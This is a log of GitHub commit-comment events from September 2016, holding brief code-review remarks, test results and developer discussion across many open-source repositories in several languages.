{"id":"4540052520","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18962621,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-09T13:29:07Z","updated_at":"2016-09-09T13:29:07Z","body":"Local STC test: Score of pgo-see vs pgobase: 123 - 99 - 378  [0.520] 600 "}},"created_at":"2016-09-09T13:29:07Z"}
{"id":"4540057279","type":"CommitCommentEvent","actor":{"login":"michalmuskala"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18962633,"position":107,"line":1443,"path":"lib/ecto/schema.ex","commit_id":"1eacc2693a0ec7c79a6813bee70c72155136c278","created_at":"2016-09-09T13:30:03Z","updated_at":"2016-09-09T13:30:03Z","body":"Shouldn't this be `Macro.escape`'d?"}},"created_at":"2016-09-09T13:30:03Z"}
{"id":"4540057614","type":"CommitCommentEvent","actor":{"login":"Gnoq"},"repo":{"name":"Gnoq/ConstruccionDeSoftware2016"},"payload":{"comment":{"id":18962635,"position":null,"line":null,"path":null,"commit_id":"a245c8130c71ba742833209bb145924b11d5e4d2","created_at":"2016-09-09T13:30:09Z","updated_at":"2016-09-09T13:30:09Z","body":"Dice práctico 2 por todos lados porque me confundí de número, pero es el 3 terminado. :+1: "}},"created_at":"2016-09-09T13:30:09Z"}
{"id":"4540059076","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":18962639,"position":7,"line":59,"path":"DokanNet/DokanNet.net4.6.csproj","commit_id":"96e2fa3dea7f8a85243b322708ffbe40596f1023","created_at":"2016-09-09T13:30:27Z","updated_at":"2016-09-09T13:30:27Z","body":"will need the input of @viciousviper here :heart: "}},"created_at":"2016-09-09T13:30:27Z"}
{"id":"4540059332","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18962640,"position":null,"line":null,"path":null,"commit_id":"f9669b34d7203692aa165c5ec71ecd2c541aa177","created_at":"2016-09-09T13:30:28Z","updated_at":"2016-09-09T13:30:28Z","body":"@Sami32 :+1: \r\n\r\n@ExSport This makes sure that the transcoded audio is what UMS already tells the renderer it is. That said, I wouldn't be that surprised if it \"broke\" something that used to work in a certain way, but it definitly is more correct."}},"created_at":"2016-09-09T13:30:28Z"}
{"id":"4540063254","type":"CommitCommentEvent","actor":{"login":"michalmuskala"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18962646,"position":55,"line":1027,"path":"lib/ecto/schema.ex","commit_id":"1eacc2693a0ec7c79a6813bee70c72155136c278","created_at":"2016-09-09T13:31:15Z","updated_at":"2016-09-09T13:31:15Z","body":"We should also document the `primary_key` option in case inline embeds are used."}},"created_at":"2016-09-09T13:31:15Z"}
{"id":"4540064460","type":"CommitCommentEvent","actor":{"login":"varund7726"},"repo":{"name":"ResurrectionRemix-Devices/android_device_samsung_jf-common"},"payload":{"comment":{"id":18962651,"position":null,"line":null,"path":null,"commit_id":"7373cb0c39351ec9842cf2db815b4993c6db312c","created_at":"2016-09-09T13:31:28Z","updated_at":"2016-09-09T13:31:28Z","body":"yes it will"}},"created_at":"2016-09-09T13:31:28Z"}
{"id":"4540069862","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18962663,"position":null,"line":null,"path":null,"commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-09T13:32:33Z","updated_at":"2016-09-09T13:32:33Z","body":"@Sami32 It might be better to come up with a correct description of what this does (what the effect is for the user to change these options)."}},"created_at":"2016-09-09T13:32:33Z"}
{"id":"4540071453","type":"CommitCommentEvent","actor":{"login":"hamsternik"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18962665,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:32:51Z","updated_at":"2016-09-09T13:32:51Z","body":"but your commit msg says about *stupid OS X*. It's not an OS X problem, please fix"}},"created_at":"2016-09-09T13:32:51Z"}
{"id":"4540072405","type":"CommitCommentEvent","actor":{"login":"g-un--"},"repo":{"name":"g-un--/fsharpscripts"},"payload":{"comment":{"id":18962671,"position":18,"line":18,"path":"freeCalc.fsx","commit_id":"b277e569af44c0f0933b3e77b020be16cd2870f3","created_at":"2016-09-09T13:33:04Z","updated_at":"2016-09-09T13:33:04Z","body":"Pff....mă pui să explic bind ul :))\r\n\r\n1. \r\n Cea mai simplă analogie ar fi să privim CalcProgram ca o listă generică de instrucțiuni: \r\nResult -> Empty și Next -> Cons.\r\n\r\n Pentru a calcula rezultatul programului un interpretor ar trebui să apeleze un fel de\r\nIEnumerable.Aggregate sau List.fold, unde la fiecare pas instrucțiunea e procesată și state-ul e acumulat.\r\n\r\n2. \r\n Dacă am un wrapper generic, o instrucțiune/program care produce un int, CalcProgram&lt;int>\r\n și vreau sa compun mai multe funcții care produc instrucțiuni/programe, de tipul int -> CalcProgram&lt;int>\r\n ar trebui să am o funcție, prin convenție bind. Cu alte cuvinte puteam să scriu programul și așa ( DSL ):\r\n Result (initialState)\r\n |> bind (fun state -> Next(Add(1, Result)))\r\n |> bind (fun state -> Next(Multiply(2, Result))) \r\n\r\n Dacă nu aveam funcții între elemente pentru logică, atunci programul chiar se apropia de o listă:\r\n Next(Multiply 2, Next(Add 1, Result)).\r\n\r\n Ca să nu scrii bind pe fiecare linie, în F# poți să te folosești de \"[Computation Expression](https://fsharpforfunandprofit.com/series/computation-expressions.html)\", dar poți trăi si fără.\r\n\r\n3. Acum dacă avem \"lista\" de instrucțiuni, compusă frumos cu funcții între elemente, unde avem logica, \r\n   mai avem nevoie doar de niste funcții recursive care interpretează \"lista\".\r\n              \r\n"}},"created_at":"2016-09-09T13:33:04Z"}
{"id":"4540072602","type":"CommitCommentEvent","actor":{"login":"bengunter"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18962672,"position":108,"line":108,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-09T13:33:07Z","updated_at":"2016-09-09T13:33:07Z","body":"I don't like this any more than you do. Memory mapped files do make a difference, but they also come with this drawback. For now, System.gc() is the only thing we can do to have any hope of cleaning up mapped files.\r\n\r\nhttp://bugs.java.com/view_bug.do?bug_id=4724038"}},"created_at":"2016-09-09T13:33:07Z"}
{"id":"4540072648","type":"CommitCommentEvent","actor":{"login":"Music-Tellsepo"},"repo":{"name":"Music-Tellsepo/My_Python"},"payload":{"comment":{"id":18962673,"position":null,"line":null,"path":null,"commit_id":"1b8198ebbfe8556433073c17fea135d06dbcd4fa","created_at":"2016-09-09T13:33:07Z","updated_at":"2016-09-09T13:33:07Z","body":"print 'Hello World !'"}},"created_at":"2016-09-09T13:33:07Z"}
{"id":"4540073532","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18962676,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T13:33:17Z","updated_at":"2016-09-09T13:33:17Z","body":"@magnumripper I didn't like the `--format=cpu-dynamic` name from the start.\r\n\r\nI would have preferred `--format=-dynamic`.\r\nBut for GPU builds, that would include all the GPU-formats.\r\n\r\nMay be `--formats=no-dynamic,no-gpu` and `--formats=all,no-dynamic,no-cuda` etc.?"}},"created_at":"2016-09-09T13:33:17Z"}
{"id":"4540074116","type":"CommitCommentEvent","actor":{"login":"bartolomeu"},"repo":{"name":"angular-ui/ui-select"},"payload":{"comment":{"id":18962680,"position":13,"line":191,"path":"docs/index.html","commit_id":"1065d99969082d15dcf6015b045b4ca42e17f444","created_at":"2016-09-09T13:33:23Z","updated_at":"2016-09-09T13:33:23Z","body":"A \"i\" was missing in the name of dependency \"Angular-Sanitize\".\r\nIt was \"Angular-Sanitze\" now \"Angular-Sanitize\""}},"created_at":"2016-09-09T13:33:23Z"}
{"id":"4540074546","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18962681,"position":107,"line":1443,"path":"lib/ecto/schema.ex","commit_id":"1eacc2693a0ec7c79a6813bee70c72155136c278","created_at":"2016-09-09T13:33:27Z","updated_at":"2016-09-09T13:33:27Z","body":"It shouldn't be escaped because it is AST at this point.\n\nOn Friday, September 9, 2016, Michał Muskała <notifications@github.com>\nwrote:\n\n> Shouldn't this be Macro.escape'd?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/elixir-ecto/ecto/commit/1eacc2693a0ec7c79a6813bee70c72155136c278#commitcomment-18962633>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAlbhW3Cl1JYkHVmuaEkg2M6PtRQ1KJks5qoV9cgaJpZM4J5DPu>\n> .\n>\n\n\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2016-09-09T13:33:27Z"}
{"id":"4540076792","type":"CommitCommentEvent","actor":{"login":"Music-Tellsepo"},"repo":{"name":"Music-Tellsepo/My_Python"},"payload":{"comment":{"id":18962685,"position":null,"line":null,"path":null,"commit_id":"1b8198ebbfe8556433073c17fea135d06dbcd4fa","created_at":"2016-09-09T13:33:53Z","updated_at":"2016-09-09T13:33:53Z","body":"print 'Hello World!'"}},"created_at":"2016-09-09T13:33:53Z"}
{"id":"4540078933","type":"CommitCommentEvent","actor":{"login":"distributev"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18962691,"position":null,"line":null,"path":null,"commit_id":"bcb9f98c93e26d4c97ef0d9f324a533a3168b298","created_at":"2016-09-09T13:34:19Z","updated_at":"2016-09-09T13:34:19Z","body":"On the /client baseUrl comes from window DOM object.\r\n\r\nWhere does it come this baseUrl on /server?"}},"created_at":"2016-09-09T13:34:19Z"}
{"id":"4540080896","type":"CommitCommentEvent","actor":{"login":"Rt-Jirapong"},"repo":{"name":"Rt-Jirapong/hello-world"},"payload":{"comment":{"id":18962697,"position":4,"line":3,"path":"README.md","commit_id":"af3ff0dffc9001e8f62ea3db264dd4d06488b752","created_at":"2016-09-09T13:34:42Z","updated_at":"2016-09-09T13:34:42Z","body":"fsdf"}},"created_at":"2016-09-09T13:34:42Z"}
{"id":"4540081101","type":"CommitCommentEvent","actor":{"login":"sonalkr132"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18962698,"position":7,"line":121,"path":"config/locales/en.yml","commit_id":"08738e1ed636ce086da923dcccda72740927d67d","created_at":"2016-09-09T13:34:44Z","updated_at":"2016-09-09T13:34:44Z","body":"@aycabta @indirect \r\n\r\nFollowing is single message for `reserved_namespace`:\r\n> This gem previously existed, but has been removed by its owner. The RubyGems.org team has reserved this gem name for X more days. After that time is up, anyone will be able to claim this gem name using gem push.\r\nIf you are the previous owner of this gem, you can change ownership of this gem using the gem owner command. You can also create new versions of this gem using gem push.\r\n\r\n`not_hosted_notice` and the page would remain the same.\r\n\r\nFollowing would be the sequence of events:\r\n-> gem owner yanks all versions of a gem older than a month\r\n-> gem namespace will be reserved for 100 days. gem page will show the present owners and the updated `reserved_namespace` message.\r\n-> after hundred days, the namespace will show `not_hosted_notice` like it use to. gem owner and any other rubygem.org user have the same rights over the namespace. ie anyone can take over the namespace with `gem push <not_hosted_gem>`."}},"created_at":"2016-09-09T13:34:44Z"}
{"id":"4540083744","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-sle"},"payload":{"comment":{"id":18962701,"position":null,"line":null,"path":null,"commit_id":"62649a9f3812c255d191466b37d795edb7b36ec7","created_at":"2016-09-09T13:35:18Z","updated_at":"2016-09-09T13:35:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5GKQnb2J&#x2F;235-doc-virtual-networking-chapter\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [DOC] virtual networking chapter</a>"}},"created_at":"2016-09-09T13:35:18Z"}
{"id":"4540084505","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18962705,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T13:35:27Z","updated_at":"2016-09-09T13:35:27Z","body":"And what about `'--format=all,no-dynamic,no-sap*,no-@DES'`?"}},"created_at":"2016-09-09T13:35:27Z"}
{"id":"4540085173","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18962706,"position":null,"line":null,"path":null,"commit_id":"44ee21163c60d7d31473e4500d894e7160a41ad9","created_at":"2016-09-09T13:35:35Z","updated_at":"2016-09-09T13:35:35Z","body":"It's a troll..."}},"created_at":"2016-09-09T13:35:35Z"}
{"id":"4540085325","type":"CommitCommentEvent","actor":{"login":"luismanuel001"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18962707,"position":null,"line":null,"path":null,"commit_id":"bcb9f98c93e26d4c97ef0d9f324a533a3168b298","created_at":"2016-09-09T13:35:37Z","updated_at":"2016-09-09T13:35:37Z","body":"From the server request req.get('host')\n\nOn Fri, Sep 9, 2016 at 9:34 AM, distributev <notifications@github.com>\nwrote:\n\n> On the /client baseUrl comes from window DOM object.\n>\n> Where does it come this baseUrl on /server?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/distributev/the-app/commit/bcb9f98c93e26d4c97ef0d9f324a533a3168b298#commitcomment-18962691>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAzus-X97cegMLjjAYiQ8eOroO4GG3Y5ks5qoWBbgaJpZM4J5DgB>\n> .\n>\n"}},"created_at":"2016-09-09T13:35:37Z"}
{"id":"4540085409","type":"CommitCommentEvent","actor":{"login":"bengunter"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18962708,"position":null,"line":null,"path":null,"commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-09T13:35:38Z","updated_at":"2016-09-09T13:35:38Z","body":"@trevorackerman Please see my comments above. I'll revert the changes to Geolocation, but I will have to add a new constructor."}},"created_at":"2016-09-09T13:35:38Z"}
{"id":"4540088637","type":"CommitCommentEvent","actor":{"login":"rasendubi"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18962714,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:36:17Z","updated_at":"2016-09-09T13:36:17Z","body":"lolno"}},"created_at":"2016-09-09T13:36:17Z"}
{"id":"4540089225","type":"CommitCommentEvent","actor":{"login":"knosach"},"repo":{"name":"RestComm/load-balancer"},"payload":{"comment":{"id":18962716,"position":15,"line":121,"path":"jar/src/main/java/org/mobicents/tools/http/balancer/HttpRequestHandler.java","commit_id":"a95027e3ae6288a5c61f66837915279bcf4d3d58","created_at":"2016-09-09T13:36:23Z","updated_at":"2016-09-09T13:36:23Z","body":"I agree"}},"created_at":"2016-09-09T13:36:23Z"}
{"id":"4540090736","type":"CommitCommentEvent","actor":{"login":"wheresmyjetpack"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18962722,"position":null,"line":null,"path":null,"commit_id":"441c4cd59da34d55ebb4a7e2cfba27d1562a212a","created_at":"2016-09-09T13:36:40Z","updated_at":"2016-09-09T13:36:40Z","body":"Awesome, I'll take a look at this!"}},"created_at":"2016-09-09T13:36:40Z"}
{"id":"4540091902","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"yenchieh86/bloc-jams"},"payload":{"comment":{"id":18962726,"position":1,"line":1,"path":"CP20_Assignment.js","commit_id":"b9efdebce7b534d146d39f211580c16bb65e28f2","created_at":"2016-09-09T13:36:54Z","updated_at":"2016-09-09T13:36:54Z","body":"These aren't comments so they error :) Make sure you comment them out!"}},"created_at":"2016-09-09T13:36:54Z"}
{"id":"4540093988","type":"CommitCommentEvent","actor":{"login":"htdvisser"},"repo":{"name":"TheThingsNetwork/ttn"},"payload":{"comment":{"id":18962730,"position":29,"line":97,"path":"ttnctl/cmd/applications_pf_set.go","commit_id":"07f59b0009401311d624c1bff2d1f764b8f0b599","created_at":"2016-09-09T13:37:20Z","updated_at":"2016-09-09T13:37:20Z","body":"@AntoineRondelet: Could you please check lines 94-97?"}},"created_at":"2016-09-09T13:37:20Z"}
{"id":"4540095294","type":"CommitCommentEvent","actor":{"login":"rongjiben"},"repo":{"name":"EpicGames/Signup"},"payload":{"comment":{"id":18962735,"position":null,"line":null,"path":null,"commit_id":"888ab3ee6e3c145d3fee45ca6e6418e4c92ba9d2","created_at":"2016-09-09T13:37:33Z","updated_at":"2016-09-09T13:37:33Z","body":"What the hell is this\r\n"}},"created_at":"2016-09-09T13:37:33Z"}
{"id":"4540096120","type":"CommitCommentEvent","actor":{"login":"nigelrobbins"},"repo":{"name":"nigelrobbins/test"},"payload":{"comment":{"id":18962740,"position":null,"line":null,"path":null,"commit_id":"ea955dc959997981a4cf5add66be62e2ae36d353","created_at":"2016-09-09T13:37:43Z","updated_at":"2016-09-09T13:37:43Z","body":"x"}},"created_at":"2016-09-09T13:37:43Z"}
{"id":"4540099317","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18962753,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T13:38:19Z","updated_at":"2016-09-09T13:38:19Z","body":"A rather Java centric view, isn't it? Also, I don't understand the semantics of `small`, but I doubt `hash` on the JVM fits them."}},"created_at":"2016-09-09T13:38:19Z"}
{"id":"4540103039","type":"CommitCommentEvent","actor":{"login":"tripledub"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":18962762,"position":4,"line":7,"path":"cdx_core/app/controllers/dashboards_controller.rb","commit_id":"62ef80d83e2e64b2d138a99afe7965bb604e47b1","created_at":"2016-09-09T13:39:00Z","updated_at":"2016-09-09T13:39:00Z","body":"Don't think we use that any more @cisaacs01? (Notifiable Diseases Dashboard)"}},"created_at":"2016-09-09T13:39:00Z"}
{"id":"4540104265","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18962764,"position":400,"line":2210,"path":"composer.lock","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-09T13:39:15Z","updated_at":"2016-09-09T13:39:15Z","body":"@nurzynskipawel jakim poleceniem dodawałeś dodatkowe zależności do `composera`? \r\nTutaj widzę, że niektóre z bibliotek się podniosły i nie wiem dlaczego to zrobiłeś?"}},"created_at":"2016-09-09T13:39:15Z"}
{"id":"4540106502","type":"CommitCommentEvent","actor":{"login":"ryo628"},"repo":{"name":"Shun01a4/Muse"},"payload":{"comment":{"id":18962772,"position":null,"line":null,"path":null,"commit_id":"7d702f50c7ec47fd3a8f23f5c437ccb47e6b424b","created_at":"2016-09-09T13:39:41Z","updated_at":"2016-09-09T13:39:41Z","body":"横画面での各種ボタンの位置が対応できてない"}},"created_at":"2016-09-09T13:39:41Z"}
{"id":"4540107711","type":"CommitCommentEvent","actor":{"login":"distributev"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18962777,"position":null,"line":null,"path":null,"commit_id":"bcb9f98c93e26d4c97ef0d9f324a533a3168b298","created_at":"2016-09-09T13:39:55Z","updated_at":"2016-09-09T13:39:55Z","body":"Good."}},"created_at":"2016-09-09T13:39:55Z"}
{"id":"4540117206","type":"CommitCommentEvent","actor":{"login":"g-un--"},"repo":{"name":"g-un--/fsharpscripts"},"payload":{"comment":{"id":18962797,"position":31,"line":31,"path":"freeCalc.fsx","commit_id":"b277e569af44c0f0933b3e77b020be16cd2870f3","created_at":"2016-09-09T13:41:40Z","updated_at":"2016-09-09T13:41:40Z","body":"let! myVar = M&lt;'r> se traduce: M&lt;'r>.bind(fun myVar -> // fix myVar pe liniile următoare ) \r\n-> pasează voloarea din burta lui M&lt;'r> pe liniile următoare \r\n\r\nlet myVar = M&lt;'r> se traduce: fun (myVar: M&lt;'r> -> // fix myVar pe liniile următoare) \r\n-> pasează chiar M&lt;'r> pe liniile următoare "}},"created_at":"2016-09-09T13:41:40Z"}
{"id":"4540118543","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"yenchieh86/bloc-jams"},"payload":{"comment":{"id":18962801,"position":19,"line":129,"path":"scripts/album.js","commit_id":"0963c45a906f2c5ccf8a8ea8fb77348da6377a4d","created_at":"2016-09-09T13:41:55Z","updated_at":"2016-09-09T13:41:55Z","body":"Watch your formatting here. There should be spaces on either side of the % sign.. same with the / sign."}},"created_at":"2016-09-09T13:41:55Z"}
{"id":"4540119146","type":"CommitCommentEvent","actor":{"login":"hamsternik"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18962804,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:42:02Z","updated_at":"2016-09-09T13:42:02Z","body":"wut, why??!"}},"created_at":"2016-09-09T13:42:02Z"}
{"id":"4540119861","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cala/database-2"},"payload":{"comment":{"id":18962807,"position":9,"line":9,"path":"updates/1397_mature_blue_sinew.sql","commit_id":"6de5eff367969442959c64564acff3107dbaf5b0","created_at":"2016-09-09T13:42:11Z","updated_at":"2016-09-09T13:42:11Z","body":"0.1 Chance for Azuregos...is not what we researched ;)"}},"created_at":"2016-09-09T13:42:11Z"}
{"id":"4540122088","type":"CommitCommentEvent","actor":{"login":"boltnev"},"repo":{"name":"SmartTeleMax/iktomi"},"payload":{"comment":{"id":18962816,"position":7,"line":52,"path":"iktomi/web/url.py","commit_id":"18b0cbee6dcc064451fe0042853858c35526d13d","created_at":"2016-09-09T13:42:34Z","updated_at":"2016-09-09T13:42:34Z","body":"Мы с Денисом не можем понять, к чему относится этот комментарий и связан ли он как-то с _decode_path. Возможно, можно описать как-то иначе для большей ясности?"}},"created_at":"2016-09-09T13:42:34Z"}
{"id":"4540125156","type":"CommitCommentEvent","actor":{"login":"AntoineRondelet"},"repo":{"name":"TheThingsNetwork/ttn"},"payload":{"comment":{"id":18962824,"position":29,"line":97,"path":"ttnctl/cmd/applications_pf_set.go","commit_id":"07f59b0009401311d624c1bff2d1f764b8f0b599","created_at":"2016-09-09T13:43:11Z","updated_at":"2016-09-09T13:43:11Z","body":"Yes, 2 returns, sorry, I modify it"}},"created_at":"2016-09-09T13:43:11Z"}
{"id":"4540138323","type":"CommitCommentEvent","actor":{"login":"NycuRO"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18962998,"position":null,"line":null,"path":null,"commit_id":"ba89867a1643b7daaff43bc7fcf572ee0f07db2b","created_at":"2016-09-09T13:45:37Z","updated_at":"2016-09-09T13:45:37Z","body":"@MrGenga With this ,synapse not work. Get crash server..."}},"created_at":"2016-09-09T13:45:37Z"}
{"id":"4540139273","type":"CommitCommentEvent","actor":{"login":"idgserpro"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18963018,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-09T13:45:47Z","updated_at":"2016-09-09T13:45:47Z","body":"What about `self.annotations = self.storage` somewhere and a `#BBB warning`? For those not using custom storage layer and still waiting for self.annotations it may work... (I'm not familiar with plone.tiles source code, this is just my 0.02c...)"}},"created_at":"2016-09-09T13:45:47Z"}
{"id":"4540144638","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18963050,"position":null,"line":null,"path":null,"commit_id":"3698b7ce2dbbcbaabd2d8401e1711d79620f2c09","created_at":"2016-09-09T13:46:46Z","updated_at":"2016-09-09T13:46:46Z","body":"#4 "}},"created_at":"2016-09-09T13:46:46Z"}
{"id":"4540150098","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18963059,"position":null,"line":null,"path":null,"commit_id":"2007a875507cc89d9f44e79cc6570af9d991c935","created_at":"2016-09-09T13:47:45Z","updated_at":"2016-09-09T13:47:45Z","body":"（╯‵□′）╯︵┻━┻自己去看ISSUE #58"}},"created_at":"2016-09-09T13:47:45Z"}
{"id":"4540160955","type":"CommitCommentEvent","actor":{"login":"rasendubi"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18963085,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:49:46Z","updated_at":"2016-09-09T13:49:46Z","body":"OS X could fix that issue/implement feature but haven't done that. The fact root cause is not OS X doesn't mean OS X has nothing to do with the issue.\r\n\r\nI generally find OS X command-line tools less friendly than Linux ones.\r\n\r\nFurthermore, fixing commit message means force-pushing -- I'm not in favor even if I agree with you."}},"created_at":"2016-09-09T13:49:46Z"}
{"id":"4540167045","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18963097,"position":16,"line":85,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"44984319e70fcc77dd9bbd6c58d9c9781e235329","created_at":"2016-09-09T13:50:54Z","updated_at":"2016-09-09T13:50:54Z","body":"This doesn't belong here. We need a RAII capsule.\r\n```c++\r\nstruct FindFileHandle {\r\n    explicit FindFileHancle(std::string const& path)  {\r\n         memset(&m_search_data, 0, sizeof(WIN32_FIND_DATA));\r\n         m_h = FindFirstFile(path.c_str(), &search_data);\r\n         if (!is_valid() && (GetLAstError() != ERROR_FILE_NOT_FOUND)) throw ....\r\n    }\r\n    ~FindFileHandle() { if (is_valid()); FindClose(m_h); }\r\n\r\n    bool next() {\r\n       assert(is_valid();\r\n       retun FindNextFile(m_h, &m_search_data) == TRUE;\r\n    }\r\n    std::string crt_filename() const { return m_search_data.cFileName ; }\r\nprivate;\r\n    bool is_valid() const { return m_h != INVALID_HANDLE_VALUE; }\r\n    HANDLE m_h;\r\n    WIN32_FIND_DATA m_search_data;\r\n};\r\n....\r\nFindFileHandle handle(strm.str());\r\n...\r\nif (handle.is_valid()) // no files => invalide\r\n{\r\n    do {\r\n        result.push_back(handle.crt_filename());\r\n    } while (handle.next());\r\n}\r\n```"}},"created_at":"2016-09-09T13:50:54Z"}
{"id":"4540176205","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18963121,"position":null,"line":null,"path":null,"commit_id":"f0abd864ae4464c10e7bd6a6f712acec25744a55","created_at":"2016-09-09T13:52:38Z","updated_at":"2016-09-09T13:52:38Z","body":"test_build_branch (lefticus) - i386-Windows-7-VisualStudio-12: Tests Failed (1536 of 2048 tests passed, 37 test warnings)\n\n * 539 tests had: AUD diffs.\n * 530 tests had: EIO diffs.\n * 422 tests had: ESO small diffs.\n * 512 tests had: RDD diffs.\n * 497 tests had: Table big diffs.\n * 116 tests had: ESO big diffs.\n * 360 tests had: MTR small diffs.\n * 88 tests had: ERR diffs.\n * 420 tests had: BND diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 29 tests had: DXF diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.0%25-red.svg)</a> \n"}},"created_at":"2016-09-09T13:52:38Z"}
{"id":"4540178790","type":"CommitCommentEvent","actor":{"login":"Nashatyrev"},"repo":{"name":"ethereum/ethereumj"},"payload":{"comment":{"id":18963128,"position":null,"line":null,"path":null,"commit_id":"11c3e8832a57b30f99f30d232bbd5d0646a0f23e","created_at":"2016-09-09T13:53:08Z","updated_at":"2016-09-09T13:53:08Z","body":"Looks pretty good!"}},"created_at":"2016-09-09T13:53:08Z"}
{"id":"4540191617","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/Infinideastudio-Frameworks"},"payload":{"comment":{"id":18963159,"position":null,"line":null,"path":null,"commit_id":"698e9d192fde627eafb7fde8363863efb369c8f2","created_at":"2016-09-09T13:55:29Z","updated_at":"2016-09-09T13:55:29Z","body":"惊啦"}},"created_at":"2016-09-09T13:55:29Z"}
